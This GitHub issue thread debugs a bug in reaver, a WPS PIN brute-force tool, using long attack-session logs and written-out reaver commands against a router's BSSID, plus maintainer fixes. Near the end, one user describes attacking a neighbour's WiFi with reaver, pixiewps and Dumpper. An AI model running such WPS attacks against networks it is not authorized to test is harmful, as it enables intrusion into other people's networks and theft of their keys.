t6x/reaver-wps-fork-t6x #64: reaver is skipping real pin.

nazar2sfive, 2016-05-12:
> Reaver v1.5.3 WiFi Protected Setup Attack Tool
> Copyright (c)
>  2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
> mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212 & Wiire & AAnarchYY & KokoSoft

## Reaver max outs its attempts

> [+] p1_index set to 10000
> [+] Pin count advanced: 10000. Max pin attempts: 11000
> [+] Quitting after 10000 crack attempts
> [-] Failed to recover WPA key

**## Last reaver output**

> [P] WPS Manufacturer: WF2411 Corp
> [P] WPS Model Name: WF2411
> [P] WPS Model Number: EV-2009-02-06
> [P] Access Point Serial Number: 123456789012347
> [+] Received M1 message
> [P] R-Nonce: 69:9a:b2:f7:e5:48:2f:06:d6:91:c4:d5:cd:2f:78:62
> [P] PKR: 23:58:53:e2:fc:7b:cf:af:bc:df:7c:25:c4:4d:12:5a:65:10:66:a6:e4:24:9c:91:73:be:e0:86:4d:c5:58:29:9d:ab:c7:16:15:84:7c:6c:80:c0:14:2e:51:e5:85:c5:41:34:dc:1e:0f:c7:78:19:f4:86:4c:3e:f1:14:bb:4c:38:95:e2:f4:86:db:09:80:93:ed:48:44:a3:c5:0f:8b:77:e0:82:38:ce:6d:f4:18:57:3c:94:54:f1:54:c9:a9:99:20:fe:be:7d:68:bc:ee:53:36:d5:03:cb:2d:5a:d2:bd:de:5a:ff:ca:6c:87:3c:d0:63:ce:f8:43:af:51:e3:18:1b:3c:69:b4:92:12:df:2f:26:6c:17:13:9b:f9:1a:b4:16:c8:9b:4b:9a:b7:69:fe:97:18:f3:bf:aa:cb:4d:ca:d5:eb:d5:4a:b3:eb:91:f5:a2:da:39:e5:09:2e:88:bd:2a:52:2e:c5:1b:e7:da:88:89:7b:e4:f2:87:22:21
> [P] AuthKey: be:8c:ba:e8:f0:35:14:91:7c:f8:e9:c3:2c:c7:a5:b2:e2:b7:59:37:36:b9:f3:e4:93:f3:42:1c:93:fe:32:cd
> [+] Sending M2 message
> [P] E-Hash1: 98:97:a0:a5:64:33:fa:99:37:a2:d4:1b:5c:01:7a:6d:9f:22:8a:c7:d4:74:00:fe:f5:56:02:f5:d4:63:fc:29
> [P] E-Hash2: 98:97:a0:a5:64:33:fa:99:37:a2:d4:1b:5c:01:7a:6d:9f:22:8a:c7:d4:74:00:fe:f5:56:02:f5:d4:63:fc:29
> [+] Received M3 message
> [+] Sending M4 message
> [+] Received WSC NACK (reason: 0x0012)
> [+] Sending WSC NACK
> [+] p1_index set to 9990
> [+] Pin count advanced: 9990. Max pin attempts: 11000
> [+] Trying pin 99895679.
> [+] Sending EAPOL START request
> [+] Received identity request
> [+] Sending identity response
> [P] E-Nonce: 69:8b:dc:36:30:00:20:7e:38:81:6b:2f:5c:e7:d0:9a
> [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
> [P] WPS Manufacturer: WF2411 Corp
> [P] WPS Model Name: WF2411
> [P] WPS Model Number: EV-2009-02-06
> [P] Access Point Serial Number: 123456789012347
> [+] Received M1 message
> [P] R-Nonce: f4:1c:9a:34:a4:24:73:83:68:72:41:99:06:a9:dd:53
> [P] PKR: bf:1a:be:4b:e8:88:dd:5c:5d:ee:f1:b4:1e:2f:f7:7b:09:c0:17:89:e1:a9:bd:0a:ae:dd:03:f1:07:c6:5e:63:70:39:81:d7:78:d9:db:1a:ff:45:90:00:c0:c0:a9:f5:48:9d:9a:1b:05:1a:42:9e:06:fc:cf:3e:2d:19:7a:aa:9e:63:19:d9:e3:81:0d:fd:dc:c1:bf:0c:8e:3c:20:76:47:1d:5c:95:ed:62:1c:d8:9f:9c:b6:fd:a9:97:68:7b:09:66:be:e7:74:b4:ae:1d:f9:2e:79:84:fa:9a:e9:e1:cb:91:4c:3b:ed:1f:ab:f1:51:43:7b:25:d4:d4:06:9e:d0:f5:1e:a2:98:da:71:51:31:89:1f:f9:c1:49:d8:64:d5:45:42:d2:f9:06:fd:44:07:aa:ea:b6:a6:fc:44:f3:78:a1:fc:9c:f0:5b:9c:76:b2:13:f5:cb:17:44:eb:06:4c:13:68:32:f5:9c:49:ab:43:4f:4b:95:61:f4:08:91
> [P] AuthKey: 65:63:68:e4:e4:ce:7e:9a:2c:48:d6:91:c7:7c:a7:9f:0a:e6:20:a3:4a:4a:ef:82:b0:07:57:34:a3:3e:f4:de
> [+] Sending M2 message
> [P] E-Hash1: f5:50:ed:ae:76:8b:29:c2:20:3e:c3:39:97:39:92:e3:a6:81:9f:db:a5:e0:2a:25:7a:bf:7a:22:bf:14:7b:0f
> [P] E-Hash2: f5:50:ed:ae:76:8b:29:c2:20:3e:c3:39:97:39:92:e3:a6:81:9f:db:a5:e0:2a:25:7a:bf:7a:22:bf:14:7b:0f
> [+] Received M3 message
> [+] Sending M4 message
> [+] Received WSC NACK (reason: 0x0012)
> [+] Sending WSC NACK
> [+] p1_index set to 9991
> [+] Pin count advanced: 9991. Max pin attempts: 11000
> [+] 90.83% complete. Elapsed time: 0d6h23m40s.
> [+] Estimated Remaining time: 0d0h33m38s
> [+] Trying pin 99905675.
> [+] Sending EAPOL START request
> [+] Received identity request
> [+] Sending identity response
> [P] E-Nonce: 33:e4:10:b1:0f:16:71:8d:2d:96:ac:63:58:b9:41:d0
> [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
> [P] WPS Manufacturer: WF2411 Corp
> [P] WPS Model Name: WF2411
> [P] WPS Model Number: EV-2009-02-06
> [P] Access Point Serial Number: 123456789012347
> [+] Received M1 message
> [P] R-Nonce: 61:32:2e:25:41:2f:06:5c:1a:76:b3:20:c0:d4:64:e7
> [P] PKR: a0:e1:ee:95:e9:4f:ec:89:fa:a4:f4:00:86:c6:06:f3:b4:92:1f:9c:6b:18:04:9a:0b:33:95:4c:a4:7f:5a:17:5f:fc:ad:33:8d:02:62:a9:19:a2:ab:ee:04:94:1d:db:9a:bc:aa:9d:c1:15:e4:47:c4:17:97:1d:ac:dc:1c:e8:11:a8:4d:0b:d8:b3:38:a7:8c:07:e9:89:c8:a5:e8:61:2e:03:94:85:8c:ad:a8:1b:33:c2:78:51:b6:ad:79:3c:be:70:a0:15:a6:cf:23:a4:e3:66:15:ab:f9:7c:98:c3:34:48:e6:89:61:d3:b1:b8:e1:b7:cb:d8:5c:2c:75:b1:d5:43:10:46:5f:a3:cf:27:d6:c1:4c:b8:97:b4:84:6f:ca:10:4a:eb:64:e2:02:3b:3d:be:69:f1:fe:48:59:68:6c:79:40:fa:bc:96:a3:9f:1a:51:75:e7:43:69:e5:f9:70:7d:2c:20:b8:40:48:21:ac:f4:bb:99:3c:70:a0:e5
> [P] AuthKey: e4:bc:1e:69:46:f3:0d:87:46:0d:3e:0a:20:ba:a6:a8:ed:d9:d4:a2:09:30:54:f5:aa:8f:ef:15:f3:bf:90:78
[... 239 lines cut ...]
> [P] WPS Model Name: WF2411
> [P] WPS Model Number: EV-2009-02-06
> [P] Access Point Serial Number: 123456789012347
> [+] Received M1 message
> [P] R-Nonce: ae:12:2c:9c:89:69:8c:d1:75:6f:cb:0d:41:92:53:e4
> [P] PKR: 76:89:af:de:7a:34:9c:27:d5:94:38:65:47:49:4f:69:64:37:ff:1c:b5:7e:54:1e:36:2c:1a:86:79:7a:e7:ad:69:36:c2:68:68:24:f4:f1:57:86:12:ac:9f:15:65:1a:f3:af:4b:40:c1:bc:a3:ea:f4:38:1e:36:be:b9:38:77:d0:ee:9a:c4:7c:ab:fe:e5:db:fc:9d:36:08:e5:da:08:a6:2c:50:7a:bb:38:4a:fe:b2:b3:a5:1b:af:44:c3:ae:93:05:8c:c5:a9:96:e8:5a:cd:b8:23:b9:e1:0a:78:7c:4d:49:85:af:3c:4c:de:bb:1d:69:7a:ce:23:cd:33:ba:70:48:f9:3d:05:0a:ae:9c:0f:23:21:a4:94:b1:56:63:4a:78:d5:bd:c0:85:6e:22:07:c9:5e:d2:39:ed:a2:84:26:f5:2b:9b:c6:e0:16:cf:17:f7:a9:2a:1e:10:25:a6:2d:7a:f2:6f:74:08:3b:62:d6:f1:fc:32:21:8d:3c:7e
> [P] AuthKey: 97:30:b8:e0:ca:0d:e9:2d:b3:68:16:1f:8d:70:4c:19:22:c2:9f:ab:1b:53:5c:01:35:bc:7c:67:59:0a:65:3d
> [+] Sending M2 message
> [P] E-Hash1: 1c:81:60:75:46:d2:01:29:49:9d:b3:2d:f8:0c:30:87:db:26:8b:a0:0b:28:03:2a:b8:d8:ad:3e:39:df:ac:2a
> [P] E-Hash2: 1c:81:60:75:46:d2:01:29:49:9d:b3:2d:f8:0c:30:87:db:26:8b:a0:0b:28:03:2a:b8:d8:ad:3e:39:df:ac:2a
> [+] Received M3 message
> [+] Sending M4 message
> [+] Received WSC NACK (reason: 0x0012)
> [+] Sending WSC NACK
> [!] WARNING: Fake NACK detected, waiting 0 seconds before re-checking
> [+] Trying pin 48200011.
> [+] Sending EAPOL START request
> [+] Received identity request
> [+] Sending identity response
> [P] E-Nonce: 60:c5:26:c2:42:b1:8a:fa:32:fa:9b:10:63:61:67:d8
> [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
> [P] WPS Manufacturer: WF2411 Corp
> [P] WPS Model Name: WF2411
> [P] WPS Model Number: EV-2009-02-06
> [P] Access Point Serial Number: 123456789012347

kcdtv, 2016-05-14:
Reaver is not "skipping" the PIN, it is still trying the correct PIN but doesn't get the credentials. 
Try to use the "-n" option in your command line.
`sudo reaver -i mon0 -b 04:8D:38:49:8C:21 -c 10 -p 48200011 -vvv -n`

nazar2sfive, 2016-05-14:
using -n
`sudo reaver -i mon0 -b 04:8D:38:49:8C:21 -c 10 -p 48200011 -vvv -n`

still the same 

> [+] Received M3 message
> [+] Sending M4 message
> [+] Received WSC NACK (reason: 0x0012)
> [+] Sending WSC NACK
> [!] WARNING: Fake NACK detected, waiting 0 seconds before re-checking
> [+] Trying pin 48200011.
> [+] Sending EAPOL START request
> [+] Received identity request
> [+] Sending identity response
> [!] WARNING: Receive timeout occurred
> [+] Sending WSC NACK
> [!] WPS transaction failed (code: 0x02), re-trying last pin
> [+] Trying pin 48200011.
> [+] Sending EAPOL START request
> [+] Received identity request
> [+] Sending identity response
> [!] WARNING: Receive timeout occurred
> [+] Sending WSC NACK
> [!] WPS transaction failed (code: 0x02), re-trying last pin

soxrok2212, 2016-05-14:
Try -N

nazar2sfive, 2016-05-14:
using -N  .. still same

`sudo reaver -i mon0 -b 04:8D:38:49:8C:21 -c 10 -p 48200011 -vvv -N`

> [+] Starting Cracking Session. Pin count: 10000, Max pin attempts: 11000
> [+] Trying pin 48200011.
> [+] Sending EAPOL START request
> [+] Received identity request
> [+] Sending identity response
> [P] E-Nonce: 73:d4:a6:cf:26:2a:5d:aa:42:1a:1a:3f:6f:ac:ba:38
> [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
> [P] WPS Manufacturer: WF2411 Corp
> [P] WPS Model Name: WF2411
> [P] WPS Model Number: EV-2009-02-06
> [P] Access Point Serial Number: 123456789012347
> [+] Received M1 message
> [P] R-Nonce: cb:52:43:38:42:ee:20:62:63:c9:6f:46:dd:79:32:dd
> [P] PKR: ba:0a:5b:ca:1f:de:52:d0:4b:ce:03:09:a5:7c:31:f1:3f:79:c4:c3:c2:e5:c2:46:60:e4:b4:22:a9:cb:7a:c7:4a:c8:a9:4b:e9:3c:67:13:41:90:0a:ee:9e:f4:f4:54:99:2d:8b:5e:7f:ca:4a:4d:71:55:15:a9:60:15:f2:2a:2b:57:d9:5a:fa:85:92:3a:87:43:c2:b5:8b:95:fd:ed:2e:01:38:71:d6:d3:9f:19:7a:bd:b5:2a:ee:3d:6b:54:11:e7:14:8b:4c:f2:20:eb:62:c5:61:7d:7a:56:c3:e4:cb:18:e1:f4:34:ea:85:fe:81:d0:a9:74:fe:bb:af:d8:bb:76:21:ce:26:9e:50:d9:f9:1d:8b:3b:e7:c9:d8:5b:ea:6d:1a:fb:ef:de:22:e1:0a:1d:a2:57:c7:ee:fb:fd:91:db:62:fe:99:9f:58:a3:12:cc:d8:bf:66:24:f1:5e:e1:73:f6:e1:3f:97:41:c8:39:42:18:7f:75:77:06:7b
> [P] AuthKey: 98:3b:c2:30:cf:32:e2:34:70:5f:a1:d8:66:85:2a:8b:87:c2:38:61:7c:a1:a9:da:eb:ae:c5:22:30:e1:86:97
> [+] Sending M2 message
> [P] E-Hash1: aa:ab:53:31:7a:6d:6e:ef:0e:65:7b:91:6e:e9:55:f8:77:c0:4a:28:18:16:85:46:4a:33:fd:df:fd:ef:85:96
> [P] E-Hash2: aa:ab:53:31:7a:6d:6e:ef:0e:65:7b:91:6e:e9:55:f8:77:c0:4a:28:18:16:85:46:4a:33:fd:df:fd:ef:85:96
> [+] Received M3 message
> [+] Sending M4 message
> [+] Received WSC NACK (reason: 0x0012)
> [+] Sending WSC NACK
> [!] WARNING: Fake NACK detected, waiting 0 seconds before re-checking
> [+] Trying pin 48200011.
>

kcdtv, 2016-05-15:
Can you connect "normally" with the PIN? (wpa_cli in linux or your network manager in windows - erase your profile to get the option, it is just proposed at first time for "a new connection")
Did you try with bully?
Did you try with reaver 1.4? 
If you cannot connect "normaly" and canot get it with the hacking tool, than it is probably an issue with your firmware . 
Or it has a kind of bug (try to update it), or your ISP did break the WPS on purpose (it happened in spain with jazztell and its ZTE router) or you need to do something more in the configuration interface (for example my alfa netwrok router need the WPS to be enables, the PIN to configured and it also needs to be rebooted with changes, otherwise the WPS PIN is not fully functional)

vk496, 2016-08-12:
Can someone test if the commit https://github.com/vk496/reaver-wps-fork-t6x/commit/e97f321556483f57e8dad3b1099efddbd4e7225e fix the problem? I can set a similar scenario for debugging

Salu2

wifislax-ng, 2016-08-13:
I test some aps , problem as i described in other thread , are related to -n argument. (broken)

Now , is fixed  , no more messages arround FAKE NACKS , and -n argument works again.

nazar2sfive, 2016-08-14:
after compiling from [(https://github.com/vk496/reaver-wps-fork-t6x/tree/master/src)]

> sudo reaver -i mon0 -b 04:8D:38:49:8C:21 -c 1 -p 48200011 -vvv -n
> 
> Reaver v1.5.3 WiFi Protected Setup Attack Tool
> Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
> mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212 & Wiire & AAnarchYY & KokoSoft
> 
> [+] Switching mon0 to channel 1
> [+] Waiting for beacon from 04:8D:38:49:8C:21
> [+] Associated with 04:8D:38:49:8C:21 (ESSID: wifiwpstest)
> [+] Starting Cracking Session. Pin count: 10000, Max pin attempts: 11000
> [+] Trying pin 48200011.
> [+] Sending EAPOL START request
> [+] Received identity request
> [+] Sending identity response
> [P] E-Nonce: 7e:73:aa:46:61:ba:87:51:23:c5:23:54:1e:44:c2:d8
> [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
> [P] WPS Manufacturer: WF2411 Corp
> [P] WPS Model Name: WF2411
> [P] WPS Model Number: EV-2009-02-06
> [P] Access Point Serial Number: 123456789012347
> [+] Received M1 message
> [P] R-Nonce: f9:78:f0:44:9e:aa:a2:3b:74:d4:d9:47:48:c5:30:3e
> [P] PKR: c9:0e:6b:0a:e9:ef:2e:97:9f:c5:55:fb:4c:ec:2c:2c:30:10:04:b6:dc:c8:17:10:d4:9b:33:ba:37:f1:51:d7:88:56:23:7d:ba:11:65:30:ca:0b:ee:75:a7:df:4d:8e:be:dd:8d:b5:d2:ea:45:9b:e8:e6:50:8d:e8:a0:8e:b5:50:e7:09:4b:7f:27:72:01:12:6f:3d:5d:62:76:7f:13:8a:71:cd:03:67:9b:6f:41:5f:68:40:a0:72:d1:88:76:35:39:29:bf:a6:52:f3:39:8f:e4:ff:49:3b:fd:53:01:35:f8:d4:99:2c:5b:97:37:70:34:81:f6:9f:34:68:53:01:b1:45:1a:ca:b2:87:e4:57:69:02:93:f6:27:ff:ad:56:c8:5e:3a:44:2c:35:52:ad:c3:1e:30:5f:46:7e:b6:80:db:56:b3:1c:de:9c:56:c5:59:74:1e:74:db:18:b1:01:55:20:b9:07:b7:ea:02:b7:55:4a:80:77:0b:8b:56
> [P] AuthKey: 65:b3:fc:e0:f9:2d:c7:3a:b1:06:31:5b:3f:1e:7b:91:96:4d:26:1b:de:9f:b3:ea:d2:70:66:70:aa:86:63:ad
> [+] Sending M2 message
> [P] E-Hash1: bf:98:52:8c:bb:0e:78:96:2a:35:ff:b2:b4:98:e3:38:dc:87:6d:dd:7a:ba:56:7f:74:ae:e2:3d:e9:ed:f4:99
> [P] E-Hash2: bf:98:52:8c:bb:0e:78:96:2a:35:ff:b2:b4:98:e3:38:dc:87:6d:dd:7a:ba:56:7f:74:ae:e2:3d:e9:ed:f4:99
> [+] Received M3 message
> [+] Sending M4 message
> [+] Received WSC NACK (reason: 0x0012)
> [+] Sending WSC NACK
> [+] p2_index set to 1
> [+] Pin count advanced: 10001. Max pin attempts: 11000
> [+] Quitting after 1 crack attempts
> [-] Failed to recover WPA key

Now it just test 1 pin and stops there even if I don't give -p 48200011

nazar2sfive, 2016-08-14:
> sudo reaver -i mon0 -b 04:8D:38:49:8C:21 -c 1 -vvv
> 
> Reaver v1.5.3 WiFi Protected Setup Attack Tool
> Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
> mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212 & Wiire & AAnarchYY & KokoSoft
> 
> [+] Switching mon0 to channel 1
> [?] Restore previous session for 04:8D:38:49:8C:21? [n/Y] n
> [+] Waiting for beacon from 04:8D:38:49:8C:21
> [+] Associated with 04:8D:38:49:8C:21 (ESSID: wifiwpstest)
> [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
> [+] Trying pin 12345670.
> [+] Sending EAPOL START request
> [+] Received identity request
> [+] Sending identity response
> [P] E-Nonce: 25:7c:3f:ba:57:fc:d2:9d:23:3a:fe:ed:7b:27:f1:37
> [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
> [P] WPS Manufacturer: WF2411 Corp
> [P] WPS Model Name: WF2411
> [P] WPS Model Number: EV-2009-02-06
> [P] Access Point Serial Number: 123456789012347
> [+] Received M1 message
> [P] R-Nonce: 22:34:02:28:1b:c5:3c:5f:1d:7c:18:2c:a1:2c:54:5f
> [P] PKR: 2a:61:6a:8a:1a:11:65:19:41:5a:d7:0b:32:2e:16:38:ff:e4:d2:7b:f4:da:60:c7:ad:e6:43:88:8c:4c:ff:3a:51:1a:12:22:f7:d9:dd:b6:29:75:6c:fa:3a:76:49:d3:dc:8b:75:b3:3b:41:9a:9b:12:00:86:88:1c:c2:d5:f7:a6:df:75:24:ec:b2:40:4d:6a:7f:fe:74:1e:58:cd:e6:77:74:bb:e2:fe:a6:c2:39:ba:7c:d5:f6:0a:df:2c:3c:92:26:d9:af:19:5a:a6:12:bf:e5:c9:5a:3e:69:80:b6:d0:a9:24:61:4a:da:b1:78:8d:6e:6b:64:34:51:15:fb:91:cf:c9:ba:a0:f8:03:a0:3e:cd:f6:62:bc:19:da:05:ff:9c:13:09:3d:fa:da:c4:a5:d5:f3:3d:9a:3e:3d:ab:0c:36:aa:a6:ad:e1:6c:91:bc:49:df:7f:67:6b:ba:6f:f6:6f:3c:09:84:89:09:06:0c:48:bd:ec:65:9c:b6:dc
> [P] AuthKey: 43:1f:6c:af:d1:a4:85:ec:92:30:ef:32:44:f1:fc:73:77:53:ba:a0:7e:47:8f:9f:b1:e1:4d:30:56:37:b8:7a
> [+] Sending M2 message
> [P] E-Hash1: 7c:53:7a:80:6f:3a:00:fe:02:90:bd:ac:e2:b3:22:c3:43:7b:19:fd:fb:65:3a:bb:2d:e2:89:d4:48:df:a0:f3
> [P] E-Hash2: 7c:53:7a:80:6f:3a:00:fe:02:90:bd:ac:e2:b3:22:c3:43:7b:19:fd:fb:65:3a:bb:2d:e2:89:d4:48:df:a0:f3
> [+] Received M3 message
> [+] Sending M4 message
> [+] Received WSC NACK (reason: 0x0012)
> [+] Sending WSC NACK
> [+] p1_index set to 1
> [+] Pin count advanced: 1. Max pin attempts: 11000
> [+] Quitting after 1 crack attempts
> [-] Failed to recover WPA key
>

vk496, 2016-08-14:
Now should work.

https://github.com/vk496/reaver-wps-fork-t6x/commit/37650dfe4b63f157838e7bfc9718b08609b35468

wifislax-ng, 2016-08-22:
That is fixed in vk496 patches..

kcdtv, 2016-08-31:
Hi guys! 
From what i understand there is a bit of confusion here. 
Let's clarify this issue.
 nazar2sfive receives an ACK when he sends the correct PIN and cannot get the key, 
The problem with the last comment made by nazar2sfive is that the issue isn't solve with the last modification  he tried. 
  Before : he was in a loop trying the same PIN with **[!] WARNING: Fake NACK detected, waiting 0 seconds before re-checking** with or without option -n or -N 
  The last time: Using the -n argument the Key is not retrieved with the correct PIN and p1 rise (as if the PIN was wrong) 

    [+] Received WSC NACK (reason: 0x0012)
    [+] Sending WSC NACK
    [+] p2_index set to 1
    [+] Pin count advanced: 10001. Max pin attempts: 11000 

Which is an error, p1 shouldn't rise in any case, the PIN is correct.
I hope that . nazar2sfive connect soon to tell us about the modification posted by vk96 
Or if anyone that is in a similar case could try the fix and publish the results here, it would be very helpful

mahmoodalam62, 2016-11-12:
I have same issue. I tested this on my neighbours wifi but failed. WPS is enabled on that wifi but reaver can't find the pin. It locks wps after 3 attempts. So I used pixiewps dust attack but it shows no pin found.
                     After that I used Dumpper v.80.9  and it shows my neighbours wifi wps pin 07711121, but when i use that pin it gives this message "WARNING: Fake NACK detected, waiting 0 seconds before re-checking". I don't know either the pin is correct or not or reaver is unable to find the key. 
I need some help. Please if anyone find solution to this problem inform me my email muhammadmahmoodalam62@gmail.com. Thanks.
I also get Decloak at the place where handshake appears.What is this 
[image]
[image]
[image]
[image]
[image]

mahmoodalam62, 2016-11-12:
Congratulations. I have Successfully wasted 10 days. Pixiewps also failed. What the fuck is this?
[image]

closed 2016-11-12 by soxrok2212